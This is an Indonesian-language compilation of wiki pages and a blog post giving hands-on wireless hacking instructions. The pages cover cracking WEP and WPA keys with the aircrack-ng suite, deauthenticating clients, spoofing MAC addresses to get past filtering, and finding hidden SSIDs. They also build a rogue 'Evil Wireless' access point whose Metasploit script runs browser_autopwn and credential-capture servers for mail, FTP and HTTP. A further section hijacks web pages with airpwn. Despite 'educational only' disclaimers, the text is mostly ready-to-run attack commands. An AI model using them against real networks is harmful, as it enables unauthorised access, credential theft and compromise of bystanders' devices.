Download as docx, pdf, or txt
Download as docx, pdf, or txt
You are on page 1of 22

Aplikasi Yang Perlu Disiapkan

From SpeedyWiki

Jump to: navigation, search

Beberapa paket software yang dibutuhkan

# apt-get install gcc g++ linux-kernel-headers libpcap0.8 libpcap0.8-dev


libnet1 libnet1-dev libdnet \
libdnet-dev subversion python2.4 python2.4-dev python-pyx python-crypto
python-psyco dhcp3-server bind9 apache2

Install beberapa aplikasi yang lebih fokus untuk hacking wireless

# apt-get install kismet scapy macchanger ettercap dsniff aircrack-ng

Pada Ubuntu 9.04 aplikasi yang di instalasi adalah

# apt-get install kismet python-scapy macchanger ettercap dsniff aircrack-ng

Download source code aplikasi berikut jika diperlukan

# cd /usr/local/src
# svn co https://802.11ninja.net/svn/lorcon/trunk lorcon
# wget http://download.aircrack-ng.org/aircrack-ng-0.9.3.tar.gz
# wget http://sid.rstack.org/code/wifitap/wifitap-0.4.0.tgz
# wget http://easynews.dl.sourceforge.net/sourceforge/airpwn/airpwn-1.30.tgz

Bagi pengguna Atheros & RT73 perlu mendownload

# wget http://snapshots.madwifi.org/madwifi-ng/madwifi-ng-r2277-
20070414.tar.gz
# wget http://homepages.tu-darmstadt.de/~p_larbig/wlan/rt2570-k2wrlz-
1.6.1.tar.bz2
# wget http://homepages.tu-darmstadt.de/~p_larbig/wlan/rt73-k2wrlz-
1.1.0.tar.bz2

Compile & Install Lorcon

# cd /usr/local/src/lorcon/
# ./configure \
-prefix=/usr \
-sysconfdir=/etc/lorcon \
-localstatedir=/var \
-mandir=/usr/share/man\
-infodir=/usr/share/info
# make
# make install

Sebaiknya dilakukan melalui airpwn seperti di bawah ini

Compile & Install Airpwn

# cd /usr/local/src/
# tar zxvf airpwn-1.3.tgz
# cd /usr/local/src/airpwn-1.3
# tar zxvf lorcon-current.tgz
# cp -Rf /usr/local/src/lorcon/* /usr/local/src/airpwn-1.3/lorcon
# cd /usr/local/src/airpwn-1.3/lorcon
# ./configure \
-prefix=/usr \
-sysconfdir=/etc/lorcon \
-localstatedir=/var \
-mandir=/usr/share/man\
-infodir=/usr/share/info
# make
# make install

Langkah selanjutnya kita perlu menginstall source code kernel:( ...

# cd /usr/local/src/airpwn-1.3
# ./configure
# make
# make install

Install Wifitap & Airsnarf

# cd /usr/local/src/
# tar zxvf wifitap-0.4.0.tgz
Instalasi aircrack-ng
From SpeedyWiki

Jump to: navigation, search

Instalasi

apt-get install aircrack-ng

[edit] Referensi

 http://www.aircrack-ng.org/doku.php?id=compatibility_drivers

Instalasi Driver MadWiFi


From SpeedyWiki

Jump to: navigation, search

Bagi anda yang menggunakan chipset Atheros tampaknya perlu menginstalasi driver MadWiFi.

Instalasi kebutuhan untuk compile

# apt-get install build-essential perl

Download source code madwifi dari

http://ath5k.org/wiki/MadWifi
http://sourceforge.net/project/showfiles.php?group_id=82936

Copy dan buka source code

# cp madwifi-0.9.4.tar.gz /usr/local/src/
# cd /usr/local/src
# tar zxvf madwifi-0.9.4.tar.gz
# cd /usr/local/src/madwifi-0.9.4

Compile & Install MadWifi Driver


# make
# make install

Load module

# modprobe ath_pci

Menyambung ke HotSpot
From SpeedyWiki

Jump to: navigation, search

Untuk menyambungkan diri ke HotSpot menggunakan text mode. Langkah yang biasa
digunakan

1. Scanning frekuensi

# iwlist scanning

2. Set ESSID interface wireless (misalnya eth1) agar sama dengan HotSpot

# iwconfig eth1 essid HotSpotSSID

3. Cek apakah sudah tersambung

# iwconfig eth1

4. Minta IP address ke DHCP Server

# dhclient eth1
[edit] Beberapa Cara untuk Cek Sambungan

1. Cek apakah routing ke Internet sudah di berikan oleh DHCP Server. Perhatikan IP gateway
untuk tujuan 0.0.0.0 apakah sudah di berikan, menggunakan perintah,

# netstat -nr

2. Ping ke gateway HotSpot

# ping <ip-gateway>

Scanning HotSpot
From SpeedyWiki

Jump to: navigation, search

Scanning Keberadaan HotSpot dapat dilakukan menggunakan text mode.

iwlist

Cara yang paling sederhana adalah menggunakan perintah

# iwlist scanning

Kismet

cara yang lebih rumit menggunakan kismet


# apt-get install kismet
# vi /etc/kismet/kismet.conf
source=none,none,addme --> source=ipw3945,wlan0,ipwsource
source=none,none,addme --> source=zd1211,eth1,zysource
source=none,none,addme --> source=ath5k, ath0, athsource

Baca http://www.kismetwireless.net/documentation.shtml untuk melihat source yang dikenali


Kismet

# kismet

airodump

Mematikan mode monitor di WLAN interface

# airmon-ng stop wlan0

Mengaktifkan mode monitor di WLAN interface

# airmon-ng start wlan0 1

Akan keluar kira-kira

Interface Chipset Driver


wlan0 Intel 3945ABG iwl3945 - [phy0]
(monitor mode enabled on mon2)
mon0 Intel 3945ABG iwl3945 - [phy0]
mon1 Intel 3945ABG iwl3945 - [phy0]

Scanning

# airodump-ng mon0

Teknik Menjebol WEP Menggunakan


Airodump dan Aircrack
From SpeedyWiki

Jump to: navigation, search


Informasi dan Pengetahuan yang terkandung pada halaman ini maupun turunannya di
peruntukan sebagai informasi pembelajaran semata. Pengetahuan ini bukan untuk
digunakan untuk melakukan tindak kejahatan maupun melawan hukum. Anda yang
melakukan tindak tersebut, berada di luar tanggung jawab penulis tulisan ini & harus
berharapan sendiri dengan aparat penegak hukum.

Bagian yang lumayan membuat pusing kepala adalah teknik untuk menjebol WEP. Teknik
berikut ini membutuhkan traffic paket yang sangat besar, biasanya akan mudah dilakukan jika
ada yang sedang melakukan transfer file di jaringan HotSpot. Jika tidak ada traffic sama sekali,
sampai kapanpun akan susah untuk di crack WEP-nya.

 Kita perlu mencatat tiga (3) hal, yaitu, (1) BSSID / MAC Addresss AP, (2) MAC address WLAN kita,
dan (3) Channel yang digunakan AP.

Misalnya,

BSSID 00:30:4F:4E:2B:50
WIFI 00:11:6b:33:d3:90
CHANNEL 2

Untuk memudahkan operasi ada baiknya melakukan di shell

export AP=00:30:4F:4E:2B:50
export WIFI=00:11:6b:33:d3:90
export CHANNEL=1

Setup supaya interface WiFi masuk ke mode monitoring menggunakan perintah

airmon-ng start wlan0 1

Biasanya akan tampil kira-kira sebagai berikut

Interface Chipset Driver


wlan0 Intel 3945ABG iwl3945 - [phy0]
(monitor mode enabled on mon0)

Perhatikan baik-baik bahwa interface wlan0 yang berubah menjadi mode monitor adalah mon0.
Kita harus menggunakan interface mon0 untuk melakukan monitor.

Jalankan airodump di WLAN mon0


airodump-ng --ivs -w hasilcapture --bssid $AP --channel $CHANNEL mon0

Versi backtrack 4.0 pre-final ternyata harus menggunakan perintah

airodump-ng --output-format ivs -w hasilcapture --bssid $AP --channel $CHANNEL


mon0

Pastikan menggunakan switch --bssid ini akan mempercepat proses cracking :) ..

Dalam contoh paket hasil monitoring akan di simpan di file hasilcapture. Agar memudahkan
proses cracking WEP pastikan kita dapat menangkap lebih dari 5000 paket.

Jalankan aircrack untuk mengcrack WEP

# aircrack-ng -a 1 -e essidapyangakandicrack -n 64 hasilcapture-01.ivs

misalnya

# aircrack-ng -a 1 -e linksys -n 64 hasilcapture-01.ivs


# aircrack-ng -a 1 -e $AP -n 64 hasilcapture-01.ivs

Bisa juga menggunakan perintah

# aircrack-ng -a 1 -n 64 hasilcapture-01.ivs

Switch -a 1 digunakan untuk menset aircrack-ng agar meng-crack WEP

Anda akan membutuhkan banyak IVS, pastikan traffic cukup tinggi. Hal ini akan mudah jika ada
yang sedang transfer file di jaringan HotSpot.
Teknik Menjebol WEP
From SpeedyWiki

Jump to: navigation, search

Informasi dan Pengetahuan yang terkandung pada halaman ini maupun turunannya di
peruntukan sebagai informasi pembelajaran semata. Pengetahuan ini bukan untuk
digunakan untuk melakukan tindak kejahatan maupun melawan hukum. Anda yang
melakukan tindak tersebut, berada di luar tanggung jawab penulis tulisan ini & harus
berharapan sendiri dengan aparat penegak hukum.

Bagian yang lumayan membuat pusing kepala adalah teknik untuk menjebol WEP.

 Kita perlu mencatat tiga (3) hal, yaitu, (1) BSSID / MAC Addresss AP, (2) MAC address WLAN kita,
dan (3) Channel yang digunakan AP.

Misalnya,

BSSID 00:30:4F:4E:2B:50
WIFI 00:11:6b:33:d3:90
CHANNEL 2

Untuk memudahkan operasi ada baiknya melakukan

# export AP=00:30:4F:4E:2B:50
# export WIFI=00:11:6b:33:d3:90
# export CHANNEL=1

Teknik mencari data BSSID & CHANNEL di atas menggunakan perintah, misalnya, card
WLAN di eth1. Pastikan bahwa eth1 berada pada mode monitor

# iwconfig eth1 mode monitor


# iwconfig eth1
# airmon-ng start eth1
# airodump-ng --ivs -w hasilcapture --bssid $AP --channel $CHANNEL eth1
Teknik selanjutnya membutuhkan kemampuan untuk berasosiasi dengan Access Point,
sayangnya biasanya sukar untuk dapat berasosiasi dengan Access Point yang terenkripsi. Jika
ada bug di Access Point, kita bisa lakukan fake authentication seolah-olah kita telah bergabung
ke Access Point tersebut

# aireplay-ng -1 0 -e ssidaccesspoint -a $AP -h $WIFI eth1

Jika berhasil authentikasi, kita dapat membuat packet palsu yang akan kita gunakan untuk
memanipulasi traffic paket yang lewat dari / menuju access point. Perintah yang digunakan
adalah

# aireplay-ng -5 -b $AP -h $WIFI eth1

Setelah kita cukup banyak berhasil menangkap paket. Proses cracking WEP dapat dilakukan
menggunakan

# aircrack-ng -a 1 -n 64 hasilcapture.ivs

Teknik Menjebol WPA


From SpeedyWiki

Jump to: navigation, search

Informasi dan Pengetahuan yang terkandung pada halaman ini maupun turunannya di
peruntukan sebagai informasi pembelajaran semata. Pengetahuan ini bukan untuk
digunakan untuk melakukan tindak kejahatan maupun melawan hukum. Anda yang
melakukan tindak tersebut, berada di luar tanggung jawab penulis tulisan ini & harus
berharapan sendiri dengan aparat penegak hukum.

Menjebol WPA hampir tidak mungkin. Tapi kalau anda mau memaksa mencoba-nya bisa
mencoba langkah berikut walaupun tidak ada jaminan sama sekali bahwa anda dapat menjebol-
nya.
 Kita perlu mencatat tiga (3) hal, yaitu, (1) BSSID / MAC Addresss AP, (2) MAC address WLAN kita,
dan (3) Channel yang digunakan AP.

Misalnya,

BSSID 00:30:4F:4E:2B:50
WIFI 00:11:6b:33:d3:90
CHANNEL 2

Untuk memudahkan operasi ada baiknya melakukan di shell

export AP=00:30:4F:4E:2B:50
export WIFI=00:11:6b:33:d3:90
export CHANNEL=1

Setup supaya interface WiFi masuk ke mode monitoring menggunakan perintah

airmon-ng start wlan0 1

Biasanya akan tampil kira-kira sebagai berikut

Interface Chipset Driver


wlan0 Intel 3945ABG iwl3945 - [phy0]
(monitor mode enabled on mon0)

Perhatikan baik-baik bahwa interface wlan0 yang berubah menjadi mode monitor adalah mon0.
Kita harus menggunakan interface mon0 untuk melakukan monitor.

Jalankan airodump di WLAN mon0

airodump-ng -w hasilcapture --bssid $AP --channel $CHANNEL mon0

Versi backtrack 4.0 pre-final ternyata harus menggunakan perintah

airodump-ng --output-format pcap -w hasilcapture --bssid $AP --channel


$CHANNEL mon0

Pastikan menggunakan switch --bssid ini akan mempercepat proses cracking :) ..

Untuk mempercepat proses gunakan aireplay-ng

aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:FD:FB:C2 mon0

Dimana
-a MAC AP
-c MAC client

Kunci dari proses cracking WPA adalah ketersediaan kamus silahkan di cek ke

 http://www.aircrack-ng.org/doku.php?id=faq
 http://www.aircrack-ng.org/doku.php?id=faq#how_can_i_crack_a_wpa-psk_network
 http://www.aircrack-ng.org/doku.php?id=faq#where_can_i_find_good_wordlists

Dalam contoh paket hasil monitoring akan di simpan di file hasilcapture.

Jalankan aircrack untuk mengcrack WPA

# aircrack-ng -w kamuspass.txt -b 00:14:6C:7E:40:80 psk*.cap


-b MAC BSSID

Versi yang lebih panjang

# aircrack-ng -a 2 -e essidapyangakandicrack -n 64 hasilcapture* -w


kamuspass.txt
# aircrack-ng -a 2 -e linksys -n 64 hasilcapture* -w kamuspass.txt
# aircrack-ng -a 2 -e $AP -n 64 hasilcapture* -w kamuspass.txt

Bisa juga menggunakan perintah

# aircrack-ng -a 2 -n 64 hasilcapture* -w kamuspass.txt

Switch -a 2 digunakan untuk menset aircrack-ng agar meng-crack WPA

[edit] Referensi

 Teknik menjebol WPA

 http://www.aircrack-ng.org/doku.php?id=faq
 http://www.aircrack-ng.org/doku.php?id=faq#how_can_i_crack_a_wpa-psk_network
 http://www.aircrack-ng.org/doku.php?id=faq#where_can_i_find_good_wordlists
Teknik Man-in-The-Middle Attack / FakeAP
From SpeedyWiki

Jump to: navigation, search

Contents
[hide]

 1 Versi Singkat membuat Fake AP


 2 Versi lengkap untuk MiTM attack
 3 Referensi
 4 Pranala Menarik

[edit] Versi Singkat membuat Fake AP


airbase-ng -e "Free WiFi" -P -C 30 -v wlan0

[edit] Versi lengkap untuk MiTM attack

Siapkan software yang di butuhkan

sudo apt-get install subversion

Summary perintah yang digunakan

svn co http://trac.aircrack-ng.org/svn/trunk/ aircrack-ng


cd aircrack-ng/
make
make install
sudo su -
airmon-ng start wlan0
airbase-ng -e "Evil Wireless" -v mon0 &
ifconfig at0 10.0.0.1 netmask 255.255.255.0
apt-get install dhcp3-server
vi /etc/dhcp3/evil-wireless.conf
option domain-name-servers 10.0.0.1;

default-lease-time 60;
max-lease-time 72;

ddns-update-style none;

authoritative;
log-facility local7;

subnet 10.0.0.0 netmask 255.255.255.0 {


range 10.0.0.100 10.0.0.254;
option routers 10.0.0.1;
option domain-name-servers 10.0.0.1;
}
dhcpd3 -cf /etc/dhcp3/evil-wireless.conf
ifconfig mon0 mtu 1800
ifconfig at0 mtu 1400
svn co http://metasploit.com/svn/framework3/trunk msf3 (butuh waktu lama &
bandwidth)

Menggunakan gems rupanya rewel & belum stabil :( ..

apt-get install rubygems


gem install activerecord sqlite3-ruby (butuh waktu lama & bandwidth)
vi evilwireless.rc
load db_sqlite3
db_create /root/evilwireless.db

use auxiliary/server/browser_autopwn

setg AUTOPWN_HOST 10.0.0.1


setg AUTOPWN_PORT 55550
setg AUTOPWN_URI /ads

set LHOST 10.0.0.1


set LPORT 45000
set SRVPORT 55550
set URIPATH /ads

run

use auxiliary/server/capture/pop3
set SRVPORT 110
set SSL false
run

use auxiliary/server/capture/pop3
set SRVPORT 995
set SSL true
run

use auxiliary/server/capture/ftp
run

use auxiliary/server/capture/imap
set SSL false
set SRVPORT 143
run

use auxiliary/server/capture/imap
set SSL true
set SRVPORT 993
run

use auxiliary/server/capture/smtp
set SSL false
set SRVPORT 25
run

use auxiliary/server/capture/smtp
set SSL true
set SRVPORT 465
run

use auxiliary/server/fakedns
unset TARGETHOST
set SRVPORT 5353
run

use auxiliary/server/fakedns
unset TARGETHOST
set SRVPORT 53
run

use auxiliary/server/capture/http
set SRVPORT 80
set SSL false
run

use auxiliary/server/capture/http
set SRVPORT 8080
set SSL false
run

use auxiliary/server/capture/http
set SRVPORT 443
set SSL true
run

use auxiliary/server/capture/http
set SRVPORT 8443
set SSL true
run
./msfconsole -r evilwireless.rc

[edit] Referensi

 http://forums.remote-exploit.org/backtrack3-howtos/19048-rogue-accesspoint-mitm-sniffing-
tutorial.html
 http://0x80.org/blog/?p=131 - The Evil Access Point
 http://forums.remote-exploit.org/wireless/23886-tutorial-how-create-fake-ap-auto-bash-
script.html - How to create Face AP
 http://ww2.mastaputa.com:9999/?p=29
 http://fix-vista.com/windows-vista-installation-setup/fishing-windows-clients-with-airbase-ng-
and-airchat
Teknik Melewati Pembatasan MAC Address
From SpeedyWiki

Jump to: navigation, search

Informasi dan Pengetahuan yang terkandung pada halaman ini maupun turunannya
diperuntukan sebagai informasi pembelajaran semata. Pengetahuan ini bukan untuk
digunakan untuk melakukan tindak kejahatan maupun melawan hukum. Anda yang
melakukan tindak tersebut, berada di luar tanggung jawab penulis tulisan ini & harus
berhadapan sendiri dengan aparat penegak hukum.

Sebagian AP akan memfilter MAC address client. Teknik menemukan MAC address client yang
diijinkan lewat oleh AP menggunakan Kismet adalah

# kismet

Lakukan

space
S - untuk men-sort
S - untuk men-sort terhadap SSID
Panah Bawah - Letakan di SSID AP yang kita inginkan.
ENTER - detail AP
C - lihat siapa saja client AP tersebut

Pastikan airmon tidak aktif di WLAN eth1

# airmon-ng stop eth1

Untuk mengubah MAC address dari WLAN di eth1 menjadi sama dengan MAC address client
yang diijinkan AP

# ifconfig eth1 down


# ifconfig eth1 hw ether 00:16:CF:C1:FA:F5
# ifconfig eth1 up

Alternatif lain
# ifconfig eth1 down
# macchanger -mac 00:16:CF:C1:FA:F5 eth1
# ifconfig eth1 up

atau untuk random MAC address

# macchanger -r eth1

Bagi rekan-rekan yang ingin melihat video tutorial-nya. Rekan Rumput Kering dari Yogyafree
membuat Tutorial Video Mengubah MAC Address menggunakan macchanger

Menemukan Hidden SSID


From SpeedyWiki

Jump to: navigation, search

Informasi dan Pengetahuan yang terkandung pada halaman ini maupun turunannya di
peruntukan sebagai informasi pembelajaran semata. Pengetahuan ini bukan untuk
digunakan untuk melakukan tindak kejahatan maupun melawan hukum. Anda yang
melakukan tindak tersebut, berada di luar tanggung jawab penulis tulisan ini & harus
berharapan sendiri dengan aparat penegak hukum.

Cara yang paling ampuh untuk menemukan Hidden SSID adalah menggunakan kismet

# kismet

Hidden SSID akan berwarna biru dan di tutup oleh tanda <> seperti tampak pada gambar.
tampilan kismet, warna biru adalah Hidden SSID

Bagi anda yang cukup beruntung dapat juga menggunakan cara di bawah ini. Tapi kemungkinan
gagal lumayan tinggi.

Pertama, scanning frekuensi pada WLAN di eth1

# airmon-ng stop eth1


# airmon-ng start eth1
# airodump-ng eth1

Jalankan airodump-ng terus menerus di sebuah Windows.

Pada Windows yang lain lakukan aireplay asumsinya AP dengan MAC 00:11:6B:60:86:91
melalui eth1

# aireplay-ng --deauth 1 -a 00:11:6B:60:86:91 eth1

Nanti akan keluar BSSID di airodump-ng


Membajak tampilan Website di Wireless Network (Rouge Access Point
dengan airpwn)

Jaringan wireless memang sangat tidak aman jika digunakan untuk


kegiatan bisnis yang bersifat penting, dengan menggunakan metode
rouge Access Point, seorang intruder dengan mudahnya membajak
jaringan wireless dan mengubah halaman website yang dibuka client
dengan tampilan palsu.
OK saya tidak akan bercerita terlalu banyak karena jemari saya
sudah terasa lunglai.
Sebenarnya tulisan ini sudah banyak dibahas di berbagai site ataupun
dari berbagai buku, saya sendiri nyontek dari bukunya Mas Irvan
(LINUX WIRELESS HACKING), yaa… walaupun dia memakai distro Debian,
saya mencoba untuk menerapkannya pada distro Fedora 8 codename Werewolf.

Persiapan
———
- Distro Fedora 8 (Werewolf)
- Wireless USB Dongle (ralink chipset)
- driver ralink
- airpwn
- lorcon

install dependensi yang dibutuhkan


———————————-
# yum install gcc automake kernel-devel libnet-devel prcre-devel

Download source code applikasi


——————————
# wget http://homepages.tu-darmstadt.de/~p_larbig/wlan/rt73-k2wrlz-3.0.1.tar.bz2
# svn co http://802.11ninja.net/svn/lorcon/trunk lorcon
# wget http://transact.dl.sourceforge.net/sourceforge/airpwn/airpwn-1.3.tgz

Hapus driver ralink default dari kernel linux = rt73usb (wlan0)


—————————————————————
# rm -rvf /lib/modules/`uname -r`/kernel/driver/net/wireless/rt2*
# depmod -a

Compile dan Install Driver Ralink = rt73 (rausb0)


————————————————-
tar jxvf rt73-k2wrlz-3.0.1.tar.bz2
cd rt73-k2wrlz-3.0.1/Module
make
make install
Compile dan Install Lorcon
————————–
# cd lorcon
# ./configure –prefix=/usr \
–localstatedir=/var \
–mandir=/usr/share/man \
–sysconfdir=/etc/lorcon
# make
# make install

Compile dan Install Airpwn


————————–
# tar zxvf airpwn-1.30.tgz
# cd airpwn-1.30
# ./configure –prefix=/usr/local –mandir=/usr/local/share/man
# make
# make install

* ” wew pada saat anda mengcompile airpwn ada tulisan error”


rupanya IFNAMSIZ belum di definisikan di dalam file wireless.h yang
berada di /usr/include/linux

# vi /usr/include/linux/wireless.h
tambahkan baris
#define IFNAMSIZ 16

* ulangi kembali tahap Compile dan Install Airpwn.

MULAI BERAKSI
=============
* Colokin Wireless USB Dongle ke lobang usb
# ifconfig rausb0 up
# iwconfig rausb0 mode monitor
# cd airpwn-1.30
# airpwn -c conf/great_html -d rt73 -i rausb0 -v -v -v
keterangan dari parameter airpwn.
-c = memanggil file konfigurasi dari airpwn.
-d = driver yang digunakan wireless, kebetulan saya menggunakan chipset ralink.
-i = nama device yang digunakan, dalam hal ini ralink telah disupport oleh lorcon
untuk menginject paket wireless.
-v = verbose mode, semakin banyak parameter -v maka semakin cepat pula verbose
yang ditampilkan.

* jika airpwn tidak berjalan, ada baiknya periksa apakah driver


atau chipset yang anda gunakan sudah di support oleh lorcon dan airpwn
jika sudah, tetapi tetap saja macet, coba putuskan koneksi dari client
dengan acess point dengan menggunakan aircrack-ng agar si client mendapatkan
paket arp yang baru.

# yum install aircrack-ng


# aireplay-ng -0 10 -a MAC_ADDR_ACCESS_POINT -c MAC_ADDR_CLIENT rausb0

* kemudian ulangi kembali perintah untuk menjalankan airpwn.

- thK’s :
irvan 4k4 z3r0byt3 (udah ngasih tau cara ngejalanin airpwn)
edday (minjemin leptopnya buat uji coba di kampus)
4de (soryy buat fedora 9, ora iso lungo *&^$(#^%@)
b00gi3 (begadang lagi yuk, ngoprek bareng, soo elo jangan bawa hengpun ????)
y0gie (hhehe.. lgi binun yaaa.. nyari atheross.., pengen bles dendem ???)
m3lar (maenin truzz prensternya ntar ajarin gua yaa…)
ti0 & t0y4n9 (rame luhh berdua, seruuuu)
and all for support me……

You might also like